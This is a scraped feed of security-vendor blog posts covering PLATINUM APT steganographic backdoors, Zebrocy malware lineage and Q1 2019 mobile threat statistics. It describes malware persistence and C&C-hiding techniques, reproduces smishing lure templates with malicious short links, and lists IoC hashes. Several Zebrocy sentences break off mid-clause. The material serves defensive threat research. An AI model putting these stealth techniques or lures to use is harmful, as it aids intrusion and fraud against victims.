!function(e,t,s,i){var n="InfogramEmbeds",o=e.getElementsByTagName("script")[0],d=/^http:/.test(e.location)?"http:":"https:";if(/^\/{2}/.test(i)&&(i=d+i),window[n]&&window[n].initialized)window[n].process&&window[n].process();else if(!e.getElementById(s)){var r=e.createElement("script");r.async=1,r.id=s,r.src=i,o.parentNode.insertBefore(r,o)}}(document,0,"infogram-async","https://e.infogram.com/js/dist/embed-loader-min.js");

Distribution of celebrity-related search queries in different languages, May 2018 – May 2019 (download)

Children also searched for information about real-life celebrities and various fictional characters. Interestingly, whatever the language, children most often searched for the same names: Harry Potter, Hitler, Donald Trump, and Kim Kardashian.

Alongside entertainment, children also use the Internet for educational purposes. The largest share of queries on the education topic were in Russian.

!function(e,t,s,i){var n="InfogramEmbeds",o=e.getElementsByTagName("script")[0],d=/^http:/.test(e.location)?"http:":"https:";if(/^\/{2}/.test(i)&&(i=d+i),window[n]&&window[n].initialized)window[n].process&&window[n].process();else if(!e.getElementById(s)){var r=e.createElement("script");r.async=1,r.id=s,r.src=i,o.parentNode.insertBefore(r,o)}}(document,0,"infogram-async","https://e.infogram.com/js/dist/embed-loader-min.js");

Distribution of search queries on the Education topic in different languages, May 2018 – May 2019 (download)

Conclusion

Every year, we see increasing numbers of children going online from mobile devices. Whereas this trend used to be more pronounced in Western countries than in the Arab world and Latin America, kids in these regions too are starting to switch to mobile platforms.

This is evidenced, above all, by the decrease in the number of visits to social networking sites from PCs. Developers are actively supporting users’ transition to mobile devices, adapting their services to smartphone screens. New social networks aimed exclusively at smartphones are becoming extremely popular with children and teenagers, who pick up innovations before adults do. Last year, for instance, the world of social networks was rocked by TikTok; Instagram and SnapChat are also increasing their audiences. Despite remaining the most popular social network in the world, Facebook is attracting ever fewer children and teenagers in the West.

Games, just like social networks, are increasingly shifting to mobile platforms. A good example is Fortnite, which children prefer to play on mobile devices and is (according to search queries) more popular than Roblox and Minecraft.

When it comes to online shopping, children still favor PCs. This is not surprising, since not all online stores have a user-friendly app or mobile version. Not for the first year did we see a rise in the popularity of the Software, Audio, Video category. And it was the first year that it dislodged the Online Communication from the top of the leaderboard. Children increasingly prefer to spend time watching videos on YouTube, and in addition to clips on the video hosting site, they also showed interest in Game of Thrones, the series Riverdale, and the latest Avengers.

We recommend using parental control to keep tabs on what children are looking at. Kaspersky Lab’s parental control component forms part of the Kaspersky Internet Security and Kaspersky Total Security solutions. We also have a separate product, Kaspersky Safe Kids, which not only prevents children from accessing undesirable websites, but notifies parents about what their children have been searching for online, and helps track their location and manage their gadget time.

Platinum is back

5 Červen, 2019 - 13:07

In June 2018, we came across an unusual set of samples spreading throughout South and Southeast Asian countries targeting diplomatic, government and military entities. The campaign, which may have started as far back as 2012, featured a multi-stage approach and was dubbed EasternRoppels. The actor behind this campaign, believed to be related to the notorious PLATINUM APT group, used an elaborate, previously unseen steganographic technique to conceal communication.

As a first stage the operators used WMI subscriptions to run an initial PowerShell downloader which, in turn, downloaded another small PowerShell backdoor. We collected many of the initial WMI PowerShell scripts and noticed that they had different hardcoded command and control (C&C) IP addresses, different encryption keys, salt for encryption (also different for each initial loader) and different active hours (meaning the malware only worked during a certain period of time every day). The C&C addresses were located on free hosting services, and the attackers made heavy use of a large number of Dropbox accounts (for storing the payload and exfiltrated data). The purpose of the PowerShell backdoor was to perform initial fingerprinting of a system since it supported a very limited set of commands: download or upload a file and run a PowerShell script.

At the time, we were investigating another threat, which we believe to be the second stage of the same campaign. We were able to find a backdoor that was implemented as a DLL and worked as a WinSock NSP (Nameservice Provider) to survive a reboot. The backdoor shares several features with the PowerShell backdoor described above: it has hardcoded active hours, it uses free domains as C&C addresses, etc. The backdoor also has a few very interesting features of its own. For example, it can hide all communication with its C&C server by using text steganography.

After deeper analysis we realized that the two threats were related. Among other things, both attacks used the same domain to store exfiltrated data, and we discovered that some of the victims were infected by both types of malware at the same time. It’s worth mentioning that in the second stage, all executable files were protected with a runtime crypter and after unpacking them we found another, previously undiscovered, backdoor that is known to be related to PLATINUM.

Our paper only includes a description of the two previously undiscovered backdoors while the full report is available to customers of the Kaspersky Intelligence Reporting service (contact intelreports@kaspersky.com).

Steganography backdoor

The main binary backdoor is installed with a dedicated dropper. When the dropper is run, it decrypts files that are embedded into its “.arch” section:

Next, it creates directories for the backdoor to operate in and saves the malware-related files in these. It normally uses paths like those used by legitimate software.

Typically, the malware drops two files: the backdoor itself and its configuration file.

After this, the dropper runs the backdoor, installs it to enable a persistence mechanism and removes itself. The configuration file always has a .cfg or .dat extension and contains the following options, encrypted with AES-256 CBC and encoded:

  • pr – stands for “Poll Retries” and specifies the interval in minutes after which the malware sends the C&C server a request for new commands to execute;
  • ht – unused;
  • sl – specifies the date and time when the malware starts running. When the date arrives, the malware clears this option.
  • opt – stands for “Office Hours”. This specifies the hours and minutes during the day when the malware is active;
  • die – stands for “Eradicate Days”. This specifies how many days the malware will work inside the victim’s computer;
  • Section “p” lists malware C&C addresses;
  • Section “t” lists legitimate URLs that will be used to ensure that an internet connection is available.
Persistence

The main backdoor is implemented as a dynamic link library (DLL) and exports a function with the name “NSPStartup”. After dropping it, the installer registers the backdoor as a winsock2 namespace provider with the help of the WSCInstallNameSpace API function and runs it by calling the WSCEnableNSProvider.

As a result of this installation, during initialization of the “svchost -k netsvcs” process upon system startup, the registered namespace provider will be loaded into the address space of the process and the function “NSPStartup” will be called.

C&C interaction

Once up and running, the backdoor compares the current time against the “Eradicate Days”, activation date and “Office Hours” values, and locates valid proxy credentials in “Credential Store” and “Protected Storage”.

When all the rules are fulfilled, the backdoor connects to the malware server and downloads an HTML page.

On the face of it, the HTML suggests that the C&C server is down:

However, this is because of the steganography. The page contains embedded commands that are encrypted with an encryption key, also embedded into the page. The embedded data is encoded with two steganography techniques and placed inside the <--1234567890> tag (see below).

On line 31, the attributes “align”, “bgcolor”, “colspan” and “rowspan” are listed in alphabetical order, whereas on line 32, the same attributes are listed in a different order. The first steganography technique is based on the principle that HTML is indifferent to the order of tag attributes. We can encode a message by permuting the attributes. Line 31 in the example above contains four tags; the number of permutations in the four tags is 4! = 24, so the line encodes log2(24) = 4 bits of information. The backdoor decodes line by line and collects an encryption key for the data, which is placed right after the HTML tags in an encoded state too, but using a second steganography technique.

The image above shows that the data is encoded as groups of spaces delimited with tabs. Each group contains from zero to seven spaces and the number of spaces represents the next three bits of data. For example, the first group on line 944 contains six spaces, so it will be decoded as 610 = 1102.

Decryption of the decoded data using the decoded AES-256 CBC key is a logical continuation.

The result is a list of commands to execute, protected the same way as the backdoor configuration file:

Raw command data extracted from the HTML page

An interpretation of the raw commands extracted from the HTML page after decryption

Commands

The backdoor that we’ve discovered supports the uploading, downloading and execution of files, it can handle requests for a process list and directory list, upgrade and uninstall itself and modify its configuration file. Each command has its own parameters, e.g. the C&C server that it requests to download or upload files, or split a file while uploading.

Config manager

While investigating further, we found another tool that turned out to be a configuration manager – an executable whose purpose was to create configuration and command files for the backdoors. The utility can configure more than 150 options.

For example, below is the result of executing the showcfg command.


The second command it supports is updatecfg, whose job was to put values specified by the operator into the configuration file.

Also, the config manager supports Upload, Download, Execute, Search, UpdateConfig, AddKeyword, ChangeKeywordFile, ChangeKey, Upgrade and Uninstall commands. After executing any of these it creates a command file, protected the same way as the configuration file, and stores it in the “CommandDir” directory (the path is specified in the configuration, option 11). As described in the ‘Steganography backdoor’ section, this backdoor doesn’t handle command files and doesn’t support commands such as ChangeKeywordFile and ChangeKey, so we figured that there was another backdoor, which made a pair with the config manager we had found. Although it would appear such a utility should run on the attacker side, we found a victim infected with this and a corresponding backdoor located in the vicinity. We called it a P2P backdoor.

P2P backdoor

This backdoor shares many features with the previous one. For example, many of the commands have similar names, both backdoors’ configuration files have options with identical names and are protected the same way, and the paths to the backdoor files are similar to legitimate ones. However, there are significant differences, too. The new backdoor actively uses many more of the options from the config, supports more commands, is capable of interacting with other infected victims and connecting them into a network (see the “Commands” section for details), and works with the C&C server in a different way. In addition, this backdoor actively uses logging: we found a log file dating back to 2012 on one victim PC.

C&C interaction

This backdoor has the ability to sniff network traffic. After the backdoor is run, it starts a sniffer for each network interface, in order to detect a specially structured packet, which is sent to the victim’s ProbePort specified in the configuration. When the sniffer finds a packet like that, it interprets it as a request to establish a connection and sets TransferPort (specified in the configuration) to listening mode. The requester immediately connects to the victim’s TransferPort and both sides perform additional checks, exchanging their encryption keys. Then the connection requester sends commands to the victim, and the victim processes these interactively. This approach allows the backdoor to maintain listening mode without keeping any socket in listening mode – it only creates a listening socket when it knows that someone is trying to connect.

Commands

The backdoor supports the same commands as the steganography backdoor and implements an additional one. The backdoor leverages the Windows index service and can search files for keywords provided by the attacker. This search can be initiated by an attacker request or on a schedule – keywords for a scheduled search are stored in a dedicated file.

All commands are supplied to the backdoor through command files. The command files are protected the same way as the config (see below).

This consists of a command id (id), a command date (dt), a command name (t) and arguments (cmd).

The creators of the malware also provide the ability to combine infected victims into a P2P network. This can help the attacker, for example, when two infected victims share the same local network, but only one of them has access to the internet. In this case, the attacker can send a command file to the unreachable victim via the reachable one. The instruction for the reachable victim that the command is intended for the other host is placed directly inside the command file. When the attacker prepares the file, a list of infected hosts involved in transferring the file to the destination is included as the h1, h2, h3, etc. options. The order in which the command file will be transferred through the victims to the destination host is included as the p1, p2, etc. options. For example, if the p1 option equals ‘2->3->1’ and the p2 option equals to ‘2->3->4’ the command file will be delivered to the hosts with the indexes 1 and 4 through hosts 2 and then 3. Each host is described as follows: %Host IP%:%Host ProbePort%:%Host TransferPort%.

Conclusion

We have discovered a new attack by this group and noted that the actors are still working on improving their malicious utility and using new techniques for making the APT stealthier. A couple of years ago, we predicted that more and more APT and malware developers would use steganography, and here is proof: the actors used two interesting steganography techniques in this APT. One more interesting detail is that the actors decided to implement the utilities they need as one huge set – this reminds us of the framework-based architecture that is becoming more and more popular. Finally, based on the custom cryptor used by the actors, we have been able to attribute this attack to the notorious PLATINUM group, which means this group is still active.

IoCs

This list includes only IoCs related to the described modules of the attack. All IoCs are available to customers of the Kaspersky Intelligence Reporting service (contact intelreports@kaspersky.com)

Steganography backdoor installer:

  • 26a83effbe14b63683f0c3e0a3f657a9
  • 4b4c3b57416c03ca7f57ff7241797456
  • 58b10ac25df04a318a19260110d43894

Obsolete steganography backdoor launcher:

  • d95d939337d789046bbda2083f88a4a0
  • b22499568d51759cf13bf8c05322dba2

Steganography backdoor:

  • 5591704fd870919930e8ae1bd0447706
  • 9179a84643bd6d1c1b8e6fe0d2330dab
  • c7fda2be17735eeaeb6c56d30fc86215
  • d1936dc97566625b2bfcab3103c048cb
  • d1a5801abb9f0dc0a44f19b2208e2b9a

P2P backdoor:

  • 0668df90c701cd75db2aa43a0481718d
  • e764a1ff12e68badb6d54f16886a128f

Config manager:

  • 8dfabe7db613bcfc6d9afef4941cd769
  • 37c76973a55134925c733f4f50108555

Zebrocy’s Multilanguage Malware Salad

3 Červen, 2019 - 16:00

Zebrocy is Russian speaking APT that presents a strange set of stripes. To keep things simple, there are three things to know about Zebrocy

  • Zebrocy is an active sub-group of victim profiling and access specialists
  • Zebrocy maintains a lineage back through 2013, sharing malware artefacts and similarities with BlackEnergy
  • The past five years of Zebrocy infrastructure, malware set, and targeting have similarities and overlaps with both the Sofacy and

    Zebrocy shares data points and crosses lines with other clusters of activity in unique and unexpected ways. Zebrocy initially shared limited infrastructure, targets, and interests with Sofacy. Zebrocy also shared malware code with past BlackEnergy/Sandworm; and targeting, and later very limited infrastructure with more recent BlackEnergy/GreyEnergy. Oddly, Turla deployed spearphish macros almost identical to previous, non-public Zebrocy code in 2018.

    It’s fantastic to see some of these same points being repeated publicly by other research teams. A previous claim that Zebrocy distributed Sofacy’s XAgent as a second stage implant remains unsubstantiated but now is replaced with findings identical to these following the SAS2019 presentation, so it seems we are all slowly getting on the same page.

    A first course with new additions

    When we originally documented a Zebrocy malware incident in late 2015, we noted an Oct 2015 AutoIT downloader and a Delphi backdoor payload. Since then, we have noted a virtual salad of Zebrocy code tossed together, built with a handful of languages, often ripped from various code sharing sites. Zebrocy activity initiates with spearphishing operations delivering various target profilers and downloaders without the use of any 0day exploits. Browser credential theft, keylogging, and Windows credential theft, along with some incidents of file and communications theft, are all on the list of Zebrocy second stage implant specials.

    This Zebrocy dish is served before the main course – gaining and maintaining access is not an easy job. And, because the group seems to maintain lineage in both the 0day capable and destructive BlackEnergy/Sandworm APT and the prolific and 0day capable Sofacy APT, this course is very interesting. Let’s take a more intelligent perspective on the Zebrocy malware set and activity and its lineage, based on reporting provided to our

    Since the SAS2019 presentation, we have identified a new Zebrocy backdoor family, deployed with a new downloader. So Zebrocy continues to expand its malware set. There appears to be both a return to C coding for the group, and also an expansion with the

    A set of Zebrocy related events best characterize years of the activity and help to carve out the group’s own profile, its lineage, malware set, infrastructure, and modus operandi.

    • Zebrocy lineage – early Sofacy infrastructure overlap (late 2015/early 2016) for the Zebrocy Delphi backdoor
    • Zebrocy lineage – Delphocy Delphi deployment and abrupt conclusion (2013 – late 2015), and start of Zebrocy Delphi timeline (late 2015)
    • Zebrocy lineage – shared, unique kernel code between BlackEnergy and Delphocy bootkit (2013 – 2015)
    • Zebrocy unique malware set – vintage Delphi programming coupled with unusual and agile development capabilities with new managed languages like Python, C#, and Go all perform screengrab anchor, volume serial number id, systeminfo and process list collection
    • Zebrocy ongoing targeting and infrastructure overlap – fairly recent
      • The full 2018 decline of SPLM/XAgent for the more traditional “Sofacy” activity
      • A coincidental new increase in Zebrocy activity
      • Shared build-id format with BlackEnergy modules
      • An expansion in Zebrocy spearphishing
      • An expansion in the managed languages the Zebrocy malware set is built on

      These predictions later turned into global events, as lighter targeting turned into a massive global surge of Zebrocy activity, sometimes sharing targets between both Sofacy and Zebrocy. Also later that year, the Zebrocy malware set expanded with C#, Python, and Go. This wouldn’t be the first or last time we reported on this group’s innovative malware set.

      Zebrocy Delphi backdoor shared artefacts rooted in Delphocy and BlackEnergy

      The limited set of 2013-2015 Delphocy intrusions in Ukraine and Poland deployed a Delphi backdoor both with and without a bootkit loader. This bootkit loader included a routine that shares the same compiled code with only the BlackEnergy kernel loaders, helping to tie Zebrocy malware to the BlackEnergy malware set.

      This unique encryption implementation was shared between BlackEnergy’s kernel loader, and Delphocy’s bootkit kernel loader code. The appearance of this code overlap coincides with several project events:

      • End of Delphocy/BlackEnergy overlapped code use, while BlackEnergy moved forward with other code
      • End of Delphocy’s user-mode Delphi payload (October 2015)
      • Start of Zebrocy’s Delphi payload (October 2015)

      A particular chunk of kernel mode code for a custom encryption routine was shared across the older Delphocy bookit and the BlackEnergy malware platform in 2013. While Delphocy replaced this bootkit with a simplified user-mode persistence technique, BlackEnergy malware continued using this code until late 2015. Then, these APTs discontinued both the Delphi-based Delphocy project and the use of this mysterious chunk of code within BlackEnergy malware. Almost immediately, Delphi-based Zebrocy backdoors began to be deployed. Several months later, a Zebrocy backdoor connected back to a domain that was registered by a particular email address. This address had been used to register another Sofacy domain hosted on a well-known Sofacy IP at the time (rammatica[.]com/raveston[.]com).

      Note that both Delphocy’s and BlackEnergy’s kernel mode code appropriated unique content in 2013 from the Carberp codebase – hashing, injection, bootkit functionality. Surprisingly, this same unique encryption cipher was seen pasted again into 2018 VPNFilter code as well. Clearly it happens with other malware, but Zebrocy’s consistent copy/paste tendency is something not frequently seen in other APT malware with a “best use” date spanning five years or more. Portions of its AutoIT code were copied from code sharing forums and pasted into their own code. This is different from Sofacy’s disappeared and exhaustive SPLM/XAgent codebase. It was used for at least six years and was entirely custom-built.

      Zebrocy’s mix

      The Zebrocy malware set is tossed together from a wide set of languages and technologies, including both legitimate and malicious code shared on online forums and sites like Github and Pastebin. This repeated “copy/paste” practice is not frequently seen in Russian speaking APT malware sets, although

      C# Zebrocy backdoor

      Zebrocy pushed a C# backdoor that maintains much the same functionality as its other assortment of backdoor implementations.

      Most interesting in this implementation is its consistent collection of screengrab and system information, and a list of running processes. Again, with this first stage backdoor, it is profiling its targets and looking for unexpected sources of credential collection to develop bespoke second stage credential harvesters against. Additionally, Zebrocy wheeled out a

      A second stage

      These findings were particularly interesting in the light of past claims about SPLM/XAgent being the second stage of choice for Zebrocy, for which there was a lot of monitoring on our part, but never any data support. Some guesses were made about why that was, perhaps Zebrocy downloaders were all mitigated prior to attempting to download further stages? But never any answers.

      Instead, we arrived at the answers ourselves. In order to account for unexpected software installations at victim systems, no matter which language, each first stage backdoor implementation collects a “system information” listing, screengrab, and enumerates running processes. This malware behavior was included in Zebrocy backdoors from the very first backdoor that we reported on, and continued into 2019 with the latest rounds of Go backdoors. After collected information is POSTed to the C2, a long delay ensues. Eventually, target systems may receive a custom built second stage implant to retrieve credentials from those unexpected software sources. More unusual software packages included little-known customized Chromium builds like CentBrowser and 7Star from Asian studios. In some cases, malware password stealers are deployed to address more common software.

      In addition, Zebrocy file content stealers and keyloggers coded in C# were detected at targets in 2017 and 2018. Some of this code and their build id value format was reviewed in the SAS2018 “Masha and these Bears” presentation.

      Served cold

      Zebrocy version 2.2 called back to a domain sharing Whois and hosting resources with Sofacy in early 2016, and later versions used naming and URL constructs very similar to BlackEnergy resources. And since then, just like BlackEnergy, mostly all of the Zebrocy C2 used no domain registrations. Communications directly to the host over IPv4 with no domain resolution are common behavior for the group’s malware. However, every now and then, Zebrocy malware calls back to servers located by hardcoded domain names.

      Its ongoing activity demonstrates a long game commitment to gaining access to targeted networks. And as we predicted at SAS2018 and SAS2019, this latest new Nim coding adds to the growing list of languages for this malware set. We will see more from Zebrocy into 2019 on government and military related organizations.

IT threat evolution Q1 2019. Statistics

23 Květen, 2019 - 12:00

These statistics are based on detection verdicts of Kaspersky Lab products received from users who consented to provide statistical data.

Quarterly figures

According to Kaspersky Security Network,

  • Kaspersky Lab solutions blocked 843,096,461 attacks launched from online resources in 203 countries across the globe.
  • 113,640,221 unique URLs were recognized as malicious by Web Anti-Virus components.
  • Attempted infections by malware designed to steal money via online access to bank accounts were logged on the computers of 243,604 users.
  • Ransomware attacks were defeated on the computers of 284,489 unique users.
  • Our File Anti-Virus detected 247,907,593 unique malicious and potentially unwanted objects.
  • Kaspersky Lab products for mobile devices detected:
    • 905,174 malicious installation packages
    • 29,841 installation packages for mobile banking Trojans
    • 27,928 installation packages for mobile ransomware Trojans
Mobile threats Quarterly highlights

Q1 2019 is remembered mainly for mobile financial threats.

First, the operators of the Russia-targeting Asacub Trojan made several large-scale distribution attempts, reaching up to 13,000 unique users per day. The attacks used active bots to send malicious links to contacts in already infected smartphones. The mailings contained one of the following messages:

{Name of victim}, you received a new mms: ____________________________ from {Name of victim’s contact}
{Name of victim}, the mms: smsfn.pro/3ftjR was received from {Name of victim’s contact}
{Name of victim}, photo: smslv.pro/c0Oj0 received from {Name of victim’s contact}
{Name of victim}, you have an mms notification ____________________________ from {Name of victim’s contact}

Second, the start of the year saw a rise in the number of malicious apps in the Google Play store aimed at stealing credentials from users of Brazilian online banking apps.

Although such malware appeared on the most popular app platform, the number of downloads was extremely low. We are inclined to believe that cybercriminals are having problems luring victims to pages with malicious apps.

Mobile threat statistics

In Q1 2019, Kaspersky Lab detected 905,174 malicious installation packages, which is 95,845 packages down on the previous quarter.

!function(e,t,s,i){var n="InfogramEmbeds",o=e.getElementsByTagName("script")[0],d=/^http:/.test(e.location)?"http:":"https:";if(/^\/{2}/.test(i)&&(i=d+i),window[n]&&window[n].initialized)window[n].process&&window[n].process();else if(!e.getElementById(s)){var r=e.createElement("script");r.async=1,r.id=s,r.src=i,o.parentNode.insertBefore(r,o)}}(document,0,"infogram-async","https://e.infogram.com/js/dist/embed-loader-min.js");

Number of detected malicious installation packages, Q2 2018 – Q1 2019 (download)

Distribution of detected mobile apps by type

!function(e,t,s,i){var n="InfogramEmbeds",o=e.getElementsByTagName("script")[0],d=/^http:/.test(e.location)?"http:":"https:";if(/^\/{2}/.test(i)&&(i=d+i),window[n]&&window[n].initialized)window[n].process&&window[n].process();else if(!e.getElementById(s)){var r=e.createElement("script");r.async=1,r.id=s,r.src=i,o.parentNode.insertBefore(r,o)}}(document,0,"infogram-async","https://e.infogram.com/js/dist/embed-loader-min.js");

Distribution of newly detected mobile apps by type, Q4 2018 and Q1 2019 (download)

Among all the threats detected in Q1 2019, the lion’s share went to potentially unsolicited RiskTool apps with 29.80%, a fall of 19 p.p. against the previous quarter. The most frequently encountered objects came from the RiskTool.AndroidOS.Dnotua (28% of all detected threats of this class), RiskTool.AndroidOS.Agent (27%), and RiskTool.AndroidOS.SMSreg (16%) families.

In second place were threats in the Trojan-Dropper class (24.93%), whose share increased by 13 p.p. The vast majority of files detected belonged to the Trojan-Dropper.AndroidOS.Wapnor families (93% of all detected threats of this class). Next came the Trojan-Dropper.AndroidOS.Agent (3%) and Trojan-Dropper.AndroidOS.Hqwar (2%) families, and others.

The share of advertising apps (adware) doubled compared to Q4 2018. The AdWare.AndroidOS.Agent (44.44% of all threats of this class), AdWare.AndroidOS.Ewind (35.93%), and AdWare.AndroidOS.Dnotua (4.73%) families were the biggest contributors.

The statistics show a significant rise in the number of mobile financial threats in Q1 2019. If in Q4 2018 the share of mobile banking Trojans was 1.85%, in Q1 2019 the figure stood at 3.24% of all detected threats.

The most frequently created objects belonged to the Trojan-Banker.AndroidOS.Svpeng (20% of all detected mobile bankers), Trojan-Banker.AndroidOS.Asacub (18%), and Trojan-Banker.AndroidOS.Agent (15%) families.

Top 20 mobile malware programs

Note that this malware rating does not include potentially dangerous or unwanted programs such as RiskTool and Adware.

Verdict %* 1 DangerousObject.Multi.Generic 54.26 2 Trojan.AndroidOS.Boogr.gsh 12.72 3 Trojan-Banker.AndroidOS.Asacub.snt 4.98 4 DangerousObject.AndroidOS.GenericML 4.35 5 Trojan-Banker.AndroidOS.Asacub.a 3.49 6 Trojan-Dropper.AndroidOS.Hqwar.bb 3.36 7 Trojan-Dropper.AndroidOS.Lezok.p 2.60 8 Trojan-Banker.AndroidOS.Agent.ep 2.53 9 Trojan.AndroidOS.Dvmap.a 1.84 10 Trojan-Banker.AndroidOS.Svpeng.q 1.83 11 Trojan-Banker.AndroidOS.Asacub.cp 1.78 12 Trojan.AndroidOS.Agent.eb 1.74 13 Trojan.AndroidOS.Agent.rt 1.72 14 Trojan-Banker.AndroidOS.Asacub.ce 1.70 15 Trojan-SMS.AndroidOS.Prizmes.a 1.66 16 Exploit.AndroidOS.Lotoor.be 1.59 17 Trojan-Dropper.AndroidOS.Hqwar.gen 1.57 18 Trojan-Dropper.AndroidOS.Tiny.d 1.51 19 Trojan-Banker.AndroidOS.Svpeng.ak 1.49 20 Trojan.AndroidOS.Triada.dl 1.47

* Unique users attacked by the relevant malware as a percentage of all users of Kaspersky Lab’s mobile security solutions that were attacked.

As is customary, first place in the Top 20 for Q1 went to the DangerousObject.Multi.Generic verdict (54.26%), which we use for malware detected using cloud technologies. Cloud technologies are deployed when the antivirus databases lack data for detecting a piece of malware, but the company’s cloud already contains information about the object. This is basically how the latest malicious programs are detected.

In second place came Trojan.AndroidOS.Boogr.gsh (12.72%). This verdict is assigned to files recognized as malicious by our system based on machine learning.

Third place went to the Trojan-Banker.AndroidOS.Asacub.snt banker (4.98%). In Q1, this family was well represented in our Top 20: four positions out of 20 (3rd, 5th, 11th, 14th).

The DangerousObject.AndroidOS.GenericML verdict (4.35%), which ranked fourth in Q1, is perhaps the most interesting. It is given to files detected by machine learning. But unlike the Trojan.AndroidOS.Boogr.gsh verdict, which is assigned to malware that is processed and detected inside Kaspersky Lab’s infrastructure, the DangerousObject.AndroidOS.GenericML verdict is given to files on the side of users of the company’s security solutions before such files go for processing. The latest threat patterns are now detected this way.

Sixth and seventeenth places were taken by members of the Hqwar dropper family: Trojan-Dropper.AndroidOS.Hqwar.bb (3.36%) and Trojan-Dropper.AndroidOS.Hqwar.gen (1.57%), respectively. These packers most often contain banking Trojans, including Asacub.

Seventh position belonged to Trojan-Dropper.AndroidOS.Lezok.p (2.60%). The Lezok family is notable for its variety of distribution schemes, among them a supply chain attack, whereby the malware is sewn into the firmware of the mobile device before delivery to the store. This is very dangerous for two reasons:

  • It is extremely difficult for an ordinary user to determine whether their device is already infected.
  • Getting rid of such malware is highly complex.

The Lezok Trojan family is designed primarily to display persistent ads, sign users up for paid SMS subscriptions, and inflate counters for apps on various platforms.

The last Trojan worthy of a mention on the topic of the Top 20 mobile threats is Trojan-Banker.AndroidOS.Agent.ep. It is encountered both in standalone form and inside Hqwar droppers. The malware has extensive capabilities for countering dynamic analysis, and can detect being launched in the Android Emulator or Genymotion environment. It can open arbitrary web pages to phish for login credentials. It uses Accessibility Services to obtain various rights and interact with other apps.

Geography of mobile threats

!function(e,t,s,i){var n="InfogramEmbeds",o=e.getElementsByTagName("script")[0],d=/^http:/.test(e.location)?"http:":"https:";if(/^\/{2}/.test(i)&&(i=d+i),window[n]&&window[n].initialized)window[n].process&&window[n].process();else if(!e.getElementById(s)){var r=e.createElement("script");r.async=1,r.id=s,r.src=i,o.parentNode.insertBefore(r,o)}}(document,0,"infogram-async","https://e.infogram.com/js/dist/embed-loader-min.js");

Map of mobile malware infection attempts, Q1 2019 (download)

Top 10 countries by share of users attacked by mobile malware:

Country* %** 1 Pakistan 37.54 2 Iran 31.55 3 Bangladesh 28.38 4 Algeria 24.03 5 Nigeria 22.59 6 India 21.53 7 Tanzania 20.71 8 Indonesia 17.16 9 Kenya 16.27 10 Mexico 12.01

* Excluded from the rating are countries with relatively few users of Kaspersky Lab’s mobile antivirus (under 10,000).
** Unique users attacked in the country as a percentage of all users of Kaspersky Lab’s mobile antivirus in the country.

Pakistan (37.54%) ranked first, with the largest number of users in this country being attacked by AdWare.AndroidOS.Agent.f, AdWare.AndroidOS.Ewind.h, and AdWare.AndroidOS.HiddenAd.et adware.

Second place was taken by Iran (31.55%), which appears consistently in the Top 10 every quarter. The most commonly encountered malware in this country was Trojan.AndroidOS.Hiddapp.bn, as well as the potentially unwanted apps RiskTool.AndroidOS.Dnotua.yfe and RiskTool.AndroidOS.FakGram.a. Of these three, the latter is the most noteworthy – the main task of this app is to intercept Telegram messages. It should be mentioned that Telegram is banned in Iran, so any of its clones are in demand, as confirmed by the infection statistics.

Third place went to Bangladesh (28.38%), where in Q1 the same advertising apps were weaponized as in Pakistan.

Mobile banking Trojans

In the reporting period, we detected 29,841 installation packages for mobile banking Trojans, almost 11,000 more than in Q4 2018.

The greatest contributions came from the creators of the Trojan-Banker.AndroidOS.Svpeng (20% of all detected banking Trojans), the second-place Trojan-Banker.AndroidOS.Asacub (18%), and the third-place Trojan-Banker.AndroidOS.Agent (15%) families.

!function(e,t,s,i){var n="InfogramEmbeds",o=e.getElementsByTagName("script")[0],d=/^http:/.test(e.location)?"http:":"https:";if(/^\/{2}/.test(i)&&(i=d+i),window[n]&&window[n].initialized)window[n].process&&window[n].process();else if(!e.getElementById(s)){var r=e.createElement("script");r.async=1,r.id=s,r.src=i,o.parentNode.insertBefore(r,o)}}(document,0,"infogram-async","https://e.infogram.com/js/dist/embed-loader-min.js");

Number of installation packages for mobile banking Trojans, Q2 2018 – Q1 2019 (download)

Verdict %* 1 Trojan-Banker.AndroidOS.Asacub.snt 23.32 2 Trojan-Banker.AndroidOS.Asacub.a 16.35 3 Trojan-Banker.AndroidOS.Agent.ep 11.82 4 Trojan-Banker.AndroidOS.Svpeng.q 8.57 5 Trojan-Banker.AndroidOS.Asacub.cp 8.33 6 Trojan-Banker.AndroidOS.Asacub.ce 7.96 7 Trojan-Banker.AndroidOS.Svpeng.ak 7.00 8 Trojan-Banker.AndroidOS.Agent.eq 4.96 9 Trojan-Banker.AndroidOS.Asacub.ar 2.47 10 Trojan-Banker.AndroidOS.Hqwar.t 2.10

* Unique users attacked by the relevant malware as a percentage of all users of Kaspersky Lab’s mobile security solutions that were attacked by banking threats.

This time, fully half the Top 10 banking threats are members of the Trojan-Banker.AndroidOS.Asacub family: five positions out of ten. The creators of this Trojan actively distributed samples throughout Q1. In particular, the number of users attacked by the Asacub.cp Trojan reached 8,200 per day. But even this high result was surpassed by Asacub.snt with 13,000 users per day at the peak of the campaign.

It was a similar story with Trojan-Banker.AndroidOS.Agent.ep: We recorded around 3,000 attacked users per day at its peak. However, by the end of the quarter, the average daily number of attacked unique users had dropped below 1,000. Most likely, this was due not to decreased demand for the Trojan, but to cybercriminals’ transition to a two-stage system of infection using Hqwar droppers.

!function(e,t,s,i){var n="InfogramEmbeds",o=e.getElementsByTagName("script")[0],d=/^http:/.test(e.location)?"http:":"https:";if(/^\/{2}/.test(i)&&(i=d+i),window[n]&&window[n].initialized)window[n].process&&window[n].process();else if(!e.getElementById(s)){var r=e.createElement("script");r.async=1,r.id=s,r.src=i,o.parentNode.insertBefore(r,o)}}(document,0,"infogram-async","https://e.infogram.com/js/dist/embed-loader-min.js");

Geography of mobile banking threats, Q1 2019 (download)

Top 10 countries by share of users attacked by mobile banking Trojans:

Country* %** 1 Australia 0.81 2 Turkey 0.73 3 Russia 0.64 4 South Africa 0.35 5 Ukraine 0.31 6 Tajikistan 0.25 7 Armenia 0.23 8 Kyrgyzstan 0.17 9 US 0.16 10 Moldova 0.16

* Excluded from the rating are countries with relatively few users of Kaspersky Lab’s mobile antivirus (under 10,000).
** Unique users attacked by mobile banking Trojans as a percentage of all users of Kaspersky Lab’s mobile security solutions in this country.

In Q1 2019, Australia (0.81%) took first place in our Top 10. The most common infection attempts we registered in this country were by Trojan-Banker.AndroidOS.Agent.eq and Trojan-Banker.AndroidOS.Agent.ep. Both types of malware are not exclusive to Australia, and used for attacks worldwide.

Second place was taken by Turkey (0.73%), where, as in Australia, Trojan-Banker.AndroidOS.Agent.ep was most often detected.

Russia is in third place (0.64%), where we most frequently detected malware from the Asacub and Svpeng families.

Mobile ransomware

